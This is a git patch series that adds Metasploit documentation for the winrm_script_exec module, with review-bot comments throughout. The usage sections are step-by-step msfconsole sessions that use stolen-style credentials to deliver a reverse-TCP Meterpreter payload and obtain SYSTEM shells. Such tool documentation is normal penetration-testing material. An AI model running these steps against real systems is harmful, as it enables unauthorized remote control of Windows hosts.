From 5ab0129f0f4dfd12b4b7b5357e9ed2fa7d1cfaa1 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 18:27:00 +0530 Subject: [PATCH 1/5] Documentation on winrm_script_exec --- .../exploit/winrm/winrm_script_exec.md | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 documentation/modules/exploit/winrm/winrm_script_exec.md diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md new file mode 100644 index 0000000000..8bc4f78ec2 --- /dev/null +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md 
@@ -0,0 +1,67 @@ +## Vulnerable Application + +Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. +IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. +[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/ + + + +## Example Usage + +``` +msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec +msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(winrm_script_exec) > set USERNAME admin +USERNAME => admin +msf exploit(winrm_script_exec) > set PASSWORD admin +PASSWORD => admin +msf exploit(winrm_script_exec) > set LHOST 192.168.198.138 +LHOST => 192.168.198.138 +msf exploit(winrm_script_exec) > set LPORT 4444 +LPORT => 4444 +msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 +RHOST => 192.168.198.130 +msf exploit(winrm_script_exec) > show options + +Module options (exploit/windows/winrm/winrm_script_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DOMAIN WORKSTATION yes The domain to use for Windows authentification + FORCE_VBS false yes Force the module to use the VBS CmdStager + PASSWORD admin yes A specific password to authenticate with + Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
+ RHOST 192.168.198.130 yes The target address + RPORT 5985 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL false no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URI /wsman yes The URI of the WinRM service + URIPATH no The URI to use for this exploit (default is random) + USERNAME admin yes A specific username to authenticate as + VHOST no HTTP server virtual host + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.198.138 yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows + + + +msf exploit(winrm_script_exec) > run +[*] Started reverse TCP handler on 192.168.198.138:4444 + + From 02a3b172b426f9c747603d65a822a02985f22d70 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 21:52:46 +0530 Subject: [PATCH 2/5] Documentation on winrm_script_exec updated 1.1 --- .../exploit/winrm/winrm_script_exec.md | 155 +++++++++++++----- 1 file changed, 114 insertions(+), 41 deletions(-) diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md index 8bc4f78ec2..c116cb94bc 100644 --- a/documentation/modules/exploit/winrm/winrm_script_exec.md +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md 
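Review bot: (patch 1, hunk @@ -0,0 +1,67 @@) the new file is created at documentation/modules/exploit/winrm/winrm_script_exec.md, but the `use` line in the same hunk names the module exploit/windows/winrm/winrm_script_exec; Metasploit module docs mirror the module path, so this belongs at documentation/modules/exploit/windows/winrm/winrm_script_exec.md, otherwise `info -d` will not find it. Within the hunk: the ``` fence opened before `msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec` is never closed, so the rest of the file renders as one code block; `[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/` is not link syntax, use `[Exploit-DB](https://www.exploit-db.com/exploits/22526/)`; "Poweshell" (twice) and "targetting" are typos; and "a feature of Windows Vista" reads as Vista-only, where "Windows Vista and later" is meant. Since the options table shows `RPORT 5985` next to `SSL false`, the description should also say that enabling SSL means pointing RPORT at the HTTPS listener (5986 by default), so readers do not send TLS to the plain-HTTP port.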
@@ -1,8 +1,10 @@ ## Vulnerable Application -Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. -IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. -[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/ +WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). +This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. + +**IMPORTANT:-** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. + 
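Review bot: the replacement opening sentence is ungrammatical and redundant: "WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol..." has a stray comma after WinRM, "in its simplest form" attaches to nothing, and SOAP is expanded here and then expanded again in the next sentence. One sentence such as "Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management, a SOAP-based protocol for remote management of Windows hosts." covers it. The hunk also deletes the Exploit-DB link, which was the document's only reference; keep it as a markdown link instead of dropping it. `**IMPORTANT:-**` should be `**IMPORTANT:**` (patch 4 of this series does exactly that, so fold it in here), and "Poweshell" and "targetting" are still misspelled on the `+` line.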
@@ -22,46 +24,117 @@ msf exploit(winrm_script_exec) > set LPORT 4444 LPORT => 4444 msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 RHOST => 192.168.198.130 -msf exploit(winrm_script_exec) > show options -Module options (exploit/windows/winrm/winrm_script_exec): +**Powershell 2.0 is used for payload delivery here** - Name Current Setting Required Description - ---- --------------- -------- ----------- - DOMAIN WORKSTATION yes The domain to use for Windows authentification - FORCE_VBS false yes Force the module to use the VBS CmdStager - PASSWORD admin yes A specific password to authenticate with - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOST 192.168.198.130 yes The target address - RPORT 5985 yes The target port (TCP) - SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 - SRVPORT 8080 yes The local port to listen on. - SSL false no Negotiate SSL/TLS for outgoing connections - SSLCert no Path to a custom SSL certificate (default is randomly generated) - URI /wsman yes The URI of the WinRM service - URIPATH no The URI to use for this exploit (default is random) - USERNAME admin yes A specific username to authenticate as - VHOST no HTTP server virtual host - - -Payload options (windows/meterpreter/reverse_tcp): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) - LHOST 192.168.198.138 yes The listen address - LPORT 4444 yes The listen port - - -Exploit target: - - Id Name - -- ---- - 0 Windows - - - -msf exploit(winrm_script_exec) > run +msf exploit(winrm_script_exec) > exploit [*] Started reverse TCP handler on 192.168.198.138:4444 +[*] checking for Powershell 2.0 +[*] Attempting to set Execution Policy +[+] Set Execution Policy Successfully +[*] Grabbing %TEMP% +[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\uFWUOIgQ.ps1 (This 
may take a few minutes)... +[*] Attempting to execute script... +[*] Sending stage (752128 bytes) to 192.168.198.130 +[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:30:05 +0100 +meterpreter > +[*] Session ID 1 (192.168.198.138:4444 -> 192.168.198.130:5985) processing InitialAutoRunScript 'post/windows/manage/smart_migrate' +[*] Current server process: powershell.exe (608) +[+] Migrating to 568 +[+] Successfully migrated to process +meterpreter > sysinfo +gComputer : WIN-JZF4OTQMX4W +OS : Windows 2008 (Build 6002, Service Pack 2). +Architecture : x86 +System Language : en_US +Meterpreter : x86/win32 +meterpreter > getuid +gServer username: NT AUTHORITY\SYSTEM +meterpreter > getpid +Current pid: 568 +meterpreter > + +**In case the VBS CmdStager is used for payload delivery here** + +msf exploit(winrm_script_exec) > set FORCE_VBS true +FORCE_VBS => true +msf exploit(winrm_script_exec) > rexploit +[*] Reloading module... +[*] Started reverse handler on 192.168.1.129:4444 +[*] User selected the FORCE_VBS option +[*] Command Stager progress - 2.01% done (2046/101936 bytes) +[*] Command Stager progress - 4.01% done (4092/101936 bytes) +[*] Command Stager progress - 6.02% done (6138/101936 bytes) +[*] Command Stager progress - 8.03% done (8184/101936 bytes) +[*] Command Stager progress - 10.04% done (10230/101936 bytes) +[*] Command Stager progress - 12.04% done (12276/101936 bytes) +[*] Command Stager progress - 14.05% done (14322/101936 bytes) +[*] Command Stager progress - 16.06% done (16368/101936 bytes) +[*] Command Stager progress - 18.06% done (18414/101936 bytes) +[*] Command Stager progress - 20.07% done (20460/101936 bytes) +[*] Command Stager progress - 22.08% done (22506/101936 bytes) +[*] Command Stager progress - 24.09% done (24552/101936 bytes) +[*] Command Stager progress - 26.09% done (26598/101936 bytes) +[*] Command Stager progress - 28.10% done (28644/101936 bytes) +[*] Command Stager progress - 30.11% 
done (30690/101936 bytes) +[*] Command Stager progress - 32.11% done (32736/101936 bytes) +[*] Command Stager progress - 34.12% done (34782/101936 bytes) +[*] Command Stager progress - 36.13% done (36828/101936 bytes) +[*] Command Stager progress - 38.14% done (38874/101936 bytes) +[*] Command Stager progress - 40.14% done (40920/101936 bytes) +[*] Command Stager progress - 42.15% done (42966/101936 bytes) +[*] Command Stager progress - 44.16% done (45012/101936 bytes) +[*] Command Stager progress - 46.16% done (47058/101936 bytes) +[*] Command Stager progress - 48.17% done (49104/101936 bytes) +[*] Command Stager progress - 50.18% done (51150/101936 bytes) +[*] Command Stager progress - 52.19% done (53196/101936 bytes) +[*] Command Stager progress - 54.19% done (55242/101936 bytes) +[*] Command Stager progress - 56.20% done (57288/101936 bytes) +[*] Command Stager progress - 58.21% done (59334/101936 bytes) +[*] Command Stager progress - 60.21% done (61380/101936 bytes) +[*] Command Stager progress - 62.22% done (63426/101936 bytes) +[*] Command Stager progress - 64.23% done (65472/101936 bytes) +[*] Command Stager progress - 66.24% done (67518/101936 bytes) +[*] Command Stager progress - 68.24% done (69564/101936 bytes) +[*] Command Stager progress - 70.25% done (71610/101936 bytes) +[*] Command Stager progress - 72.26% done (73656/101936 bytes) +[*] Command Stager progress - 74.26% done (75702/101936 bytes) +[*] Command Stager progress - 76.27% done (77748/101936 bytes) +[*] Command Stager progress - 78.28% done (79794/101936 bytes) +[*] Command Stager progress - 80.29% done (81840/101936 bytes) +[*] Command Stager progress - 82.29% done (83886/101936 bytes) +[*] Command Stager progress - 84.30% done (85932/101936 bytes) +[*] Command Stager progress - 86.31% done (87978/101936 bytes) +[*] Command Stager progress - 88.31% done (90024/101936 bytes) +[*] Command Stager progress - 90.32% done (92070/101936 bytes) +[*] Command Stager progress - 92.33% done 
(94116/101936 bytes) +[*] Command Stager progress - 94.34% done (96162/101936 bytes) +[*] Command Stager progress - 96.34% done (98208/101936 bytes) +[*] Command Stager progress - 98.35% done (100252/101936 bytes) +[*] Sending stage (752128 bytes) to 192.168.198.130 +[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:46:05 +0100 +[*] Session ID 2 (192.168.198.138:4444 -> 192.168.1.142:49158) processing InitialAutoRunScript 'post/windows/manage/smart_migrate' +[*] Current server process: mSPvA.exe (3548) +[+] Migrating to 580 +[+] Successfully migrated to process +[*] nil +[*] Command Stager progress - 100.00% done (101936/101936 bytes) +meterpreter > getpid +Current pid: 580 +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > sysinfo +Computer : WIN-OPAUFTQFWTB +OS : Windows 2008 (Build 6002, Service Pack 2). +Architecture : x86 +System Language : en_US +Meterpreter : x86/win32 +meterpreter > + + + + + + From d22e43dedd58edfe10271e0f88ea94fd8f54f676 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 23:11:23 +0530 Subject: [PATCH 3/5] Documentation on winrm_script_exec updated 1.2 --- .../exploit/winrm/winrm_script_exec.md | 40 +++++++++++-------- 1 file changed, 23 insertions(+), 17 deletions(-) diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md index c116cb94bc..997beb5e99 100644 --- a/documentation/modules/exploit/winrm/winrm_script_exec.md +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md 
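Review bot: (patch 2, hunk @@ -22,46 +24,117 @@) the VBS CmdStager transcript is spliced from different runs, so its addresses contradict each other: the `set` lines above it use LHOST 192.168.198.138 and RHOST 192.168.198.130, but the run prints "Started reverse handler on 192.168.1.129:4444", then "session 2 opened (192.168.198.138:4444 -> 192.168.198.130:5985)", then "Session ID 2 (192.168.198.138:4444 -> 192.168.1.142:49158)". Re-run once and paste a single consistent transcript rather than patching individual lines. Other points in the same hunk: the `**Powershell 2.0 is used for payload delivery here**` and `**In case the VBS CmdStager...**` lines sit inside the ``` fence still open from the first session, so they render as literal asterisks; "gComputer" and "gServer username" carry a stray leading g; "[*] nil" is debris; the fifty "Command Stager progress" lines can be cut to the first and last with an ellipsis line between them; and removing the `show options` output removes the only place FORCE_VBS, DOMAIN and URI were described, so keep a short options section. Finally, the output shows the module writing a .ps1 under %TEMP%, changing the PowerShell execution policy and, in the VBS path, running a dropped executable (mSPvA.exe); a short Notes paragraph listing these on-target artifacts would help users clean up and gives defenders something concrete to look for.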
@@ -5,11 +5,12 @@ This module uses valid credentials to login to the WinRM service and execute a p **IMPORTANT:-** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. - - - ## Example Usage +## Windows 2008 + +**Powershell 2.0 is used for payload delivery here** + ``` msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp @@ -24,9 +25,6 @@ msf exploit(winrm_script_exec) > set LPORT 4444 LPORT => 4444 msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 RHOST => 192.168.198.130 - -**Powershell 2.0 is used for payload delivery here** - msf exploit(winrm_script_exec) > exploit [*] Started reverse TCP handler on 192.168.198.138:4444 [*] checking for Powershell 2.0 @@ -54,13 +52,28 @@ meterpreter > getpid Current pid: 568 meterpreter > +``` + **In case the VBS CmdStager is used for payload delivery here** +``` +msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec +msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(winrm_script_exec) > set USERNAME admin +USERNAME => admin +msf exploit(winrm_script_exec) > set PASSWORD admin +PASSWORD => admin +msf exploit(winrm_script_exec) > set LHOST 192.168.198.138 +LHOST => 192.168.198.138 +msf exploit(winrm_script_exec) > set LPORT 4444 +LPORT => 4444 +msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 +RHOST => 192.168.198.130 msf exploit(winrm_script_exec) > set FORCE_VBS true FORCE_VBS => true -msf exploit(winrm_script_exec) > rexploit -[*] Reloading module... -[*] Started reverse handler on 192.168.1.129:4444 +msf exploit(winrm_script_exec) > exploit +[*] Started reverse TCP handler on 192.168.198.138:4444 [*] User selected the FORCE_VBS option [*] Command Stager progress - 2.01% done (2046/101936 bytes) [*] Command Stager progress - 4.01% done (4092/101936 bytes) 
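Review bot: (patch 3, hunk @@ -5,11 +5,12 @@) `## Windows 2008` is added at the same heading level as `## Example Usage`, so the target section is a sibling of the usage section rather than nested under it; make it `### Windows 2008`. Moving the bold "Powershell 2.0 is used for payload delivery here" line above the opening ``` is the right fix for the rendering problem from patch 2.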
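Review bot: (patch 3, hunk @@ -54,13 +52,28 @@) changing "Started reverse handler on 192.168.1.129:4444" to "Started reverse TCP handler on 192.168.198.138:4444" and replacing `rexploit` / "Reloading module..." with `exploit` edits the transcript by hand instead of regenerating it, and the untouched later lines of the same run still report "192.168.1.142:49158", so the address mismatch remains. Either re-run the VBS case against the same target and paste the real output, or update every address in that block in the same commit. Repeating the full `use` and `set` sequence for the second case is also noise; "Same settings as above, then:" followed by `set FORCE_VBS true` and `exploit` is enough.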
@@ -130,11 +143,4 @@ Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > - - - - - - - - +``` From 90744b0162d3590c46ba017c6b07c2bc91882918 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 23:31:30 +0530 Subject: [PATCH 4/5] Documentation on winrm_script_exec updated 1.3 --- documentation/modules/exploit/winrm/winrm_script_exec.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md index 997beb5e99..6ff1e3847b 100644 --- a/documentation/modules/exploit/winrm/winrm_script_exec.md +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md @@ -3,11 +3,11 @@ WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. -**IMPORTANT:-** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. +**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. -## Example Usage +### Example Usage -## Windows 2008 +### Windows 2008 **Powershell 2.0 is used for payload delivery here** 
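Review bot: (patch 4, hunk @@ -3,11 +3,11 @@) this hunk makes `### Example Usage` and `### Windows 2008` the same level, so Windows 2008 is still not a subsection of Example Usage, and patch 5 then bumps Example Usage back to `##`. Settle on `## Example Usage` / `### Windows 2008` in one commit. The changed `+**IMPORTANT:**` line is also the place to fix "targetting" and "Poweshell", which survive unchanged on that same line.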
@@ -54,7 +54,7 @@ meterpreter > ``` -**In case the VBS CmdStager is used for payload delivery here** +**VBS CmdStager is used for payload delivery here** ``` msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec From 18fec876ce2382f6387305dc6b0a71598e3cf5e3 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 23:43:08 +0530 Subject: [PATCH 5/5] Documentation on winrm_script_exec updated 1.4 --- documentation/modules/exploit/winrm/winrm_script_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md index 6ff1e3847b..8612558f64 100644 --- a/documentation/modules/exploit/winrm/winrm_script_exec.md +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md @@ -5,7 +5,7 @@ This module uses valid credentials to login to the WinRM service and execute a p **IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. -### Example Usage +## Example Usage ### Windows 2008
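Review bot: (patch 5, hunk @@ -5,7 +5,7 @@) this one-line heading fix and patches 2 through 4 all rework the same new file; squash the series into a single commit with a descriptive subject (for example "Add documentation for exploit/windows/winrm/winrm_script_exec") rather than "updated 1.1" through "1.4", which say nothing about what changed. Before merge, the doc should also state which Windows and PowerShell versions the two delivery methods were tested on: both transcripts show Windows 2008 SP2 x86 only, while the IMPORTANT note concerns x64 targets, so one x64 run would back that warning.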